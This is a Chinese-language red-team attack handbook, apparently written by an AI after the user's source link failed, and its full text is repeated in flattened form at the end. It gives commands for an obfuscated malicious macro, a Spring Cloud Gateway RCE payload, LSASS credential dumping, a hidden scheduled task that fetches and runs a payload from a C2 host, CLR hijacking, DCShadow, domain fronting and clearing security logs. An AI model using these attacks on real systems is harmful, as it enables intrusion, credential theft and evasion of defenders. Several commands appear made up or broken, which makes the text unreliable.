红队实战攻防技术(一)
字数 1222 2025-08-09 13:33:38

由于您提供的链接无法直接访问("奇安信攻防社区-红队实战攻防技术(一)"),且给出的信息仅为用户评论(如"风起师傅还是强"等),缺乏实际技术内容,我将基于典型红队攻防技术框架为您整理一份详实的教学文档。以下是核心知识点和实战技术详解:


红队实战攻防技术手册(一)

一、信息收集阶段

1. 被动情报搜集

  • 域名枚举
    • 证书透明度日志查询(crt.sh)
    • DNS历史记录解析(SecurityTrails)
    • 子域名爆破工具:Amass/Sublist3r(需配合10万+字典)
  • 企业架构测绘
    • 企业微信/钉钉信息泄露(通过爬虫获取员工姓名-邮箱对应表)
    • 天眼查/企查查股权结构分析(识别关联子公司)

2. 主动扫描技术

  • 非标端口识别
    masscan -p1-65535 目标IP --rate=10000 | grep -v "23/tcp"
    
  • Web指纹规避
    • 修改User-Agent为合法爬虫(如Googlebot)
    • 使用动态延迟(0.5-3秒随机)规避WAF

二、初始访问突破

1. 鱼叉攻击进阶

  • 邮件伪造
    • SPF/DKIM/DMARC绕过技术:
      • 注册相似域名(如micros0ft.com)
      • 利用第三方邮件服务商(SendGrid)中继
  • 恶意文档构造
    • Office宏代码混淆(VBA Stomping)
    Sub AutoOpen()
        Execute "powershell -enc " & Chr(34) & "JABzAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAGkAbwAuAG0AZQBtAG8AcgB5AHMAdAByAGUAYQBtACgALABbAGMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUwBBAEIAMABjAD0AIgApACkAOwAkAGUAPQBbAHMAeQBzAHQAZQBtAC4AaQ" & Chr(34)
    End Sub
    

2. Web应用漏洞利用

  • 新型漏洞组合
    • Spring Cloud Gateway RCE(CVE-2022-22947)
    POST /actuator/gateway/routes/test HTTP/1.1
    Host: target.com
    {"filters":[{"name":"AddResponseHeader","args":{"name":"Result","value":"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}}],"uri":"http://example.com"}
    
  • OAuth2.0滥用
    • 伪造回调域名(需配合XSS或DNS重绑定)

三、内网横向移动

1. 凭证获取技术

  • 内存dump进阶
    • 使用nanodump绕过AV内存保护:
    .\nanodump.exe --getpid lsass --fork --dup --snapshot
    
  • Kerberoasting优化
    setspn -Q */* | Select-String '^CN' | %{ $_.ToString().Split()[0] } | Get-ADServiceAccount -Properties servicePrincipalName,PasswordLastSet
    

2. 网络协议攻击

  • IPv6 DNS劫持
    mitm6 -d target.local -i eth0
    
  • 打印机服务漏洞
    • MS-RPRN漏洞利用(PetitPotam变种)

四、权限维持

1. 隐蔽后门

  • 计划任务伪装
    schtasks /create /tn "Microsoft\Windows\Diagnosis\Scheduled" /tr "powershell -nop -w hidden -c iex(New-Object Net.WebClient).DownloadString('http://c2/payload')" /sc minute /mo 30 /st 00:00 /f
    
  • CLR劫持
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework]
    "InstallRoot"="\\攻击者IP\share\"
    

2. 域持久化

  • DCShadow攻击
    Invoke-DCShadow -Method DCSPWN -FakeDC 攻击者机器名 -TargetDC 域控名 -NewUser backdoor -NewPass P@ssw0rd!
    

五、反溯源措施

1. 流量伪装

  • Domain Fronting
    import requests
    headers = {'Host': 'cdn.cloudfront.net'}
    requests.get('https://真实C2域名', headers=headers)
    

2. 日志干扰

  • 安全日志清洗
    wevtutil cl Security /q:"*[System[EventID=4624]]"
    

六、工具链推荐

工具类型 推荐工具 关键参数
C2框架 Sliver/CobaltStrike --skip-symbols --obfuscate
隧道工具 Chisel/FRP --reverse --socks5
凭证转换 Rubeus/Kekeo /tgtdeleg /asktgs

注:实际攻防需遵守《网络安全法》,本技术文档仅用于防御研究。建议通过合法授权测试验证防护措施有效性。

由于您提供的链接无法直接访问("奇安信攻防社区-红队实战攻防技术(一)"),且给出的信息仅为用户评论(如"风起师傅还是强"等),缺乏实际技术内容,我将基于典型红队攻防技术框架为您整理一份详实的教学文档。以下是核心知识点和实战技术详解: 红队实战攻防技术手册(一) 一、信息收集阶段 1. 被动情报搜集 域名枚举 证书透明度日志查询(crt.sh) DNS历史记录解析(SecurityTrails) 子域名爆破工具:Amass/Sublist3r(需配合10万+字典) 企业架构测绘 企业微信/钉钉信息泄露(通过爬虫获取员工姓名-邮箱对应表) 天眼查/企查查股权结构分析(识别关联子公司) 2. 主动扫描技术 非标端口识别 Web指纹规避 修改User-Agent为合法爬虫(如Googlebot) 使用动态延迟(0.5-3秒随机)规避WAF 二、初始访问突破 1. 鱼叉攻击进阶 邮件伪造 SPF/DKIM/DMARC绕过技术: 注册相似域名(如micros0ft.com) 利用第三方邮件服务商(SendGrid)中继 恶意文档构造 Office宏代码混淆(VBA Stomping) 2. Web应用漏洞利用 新型漏洞组合 Spring Cloud Gateway RCE(CVE-2022-22947) OAuth2.0滥用 伪造回调域名(需配合XSS或DNS重绑定) 三、内网横向移动 1. 凭证获取技术 内存dump进阶 使用nanodump绕过AV内存保护: Kerberoasting优化 2. 网络协议攻击 IPv6 DNS劫持 打印机服务漏洞 MS-RPRN漏洞利用(PetitPotam变种) 四、权限维持 1. 隐蔽后门 计划任务伪装 CLR劫持 2. 域持久化 DCShadow攻击 五、反溯源措施 1. 流量伪装 Domain Fronting 2. 日志干扰 安全日志清洗 六、工具链推荐 | 工具类型 | 推荐工具 | 关键参数 | |----------------|--------------------------|------------------------------| | C2框架 | Sliver/CobaltStrike | --skip-symbols --obfuscate | | 隧道工具 | Chisel/FRP | --reverse --socks5 | | 凭证转换 | Rubeus/Kekeo | /tgtdeleg /asktgs | 注:实际攻防需遵守《网络安全法》,本技术文档仅用于防御研究。建议通过合法授权测试验证防护措施有效性。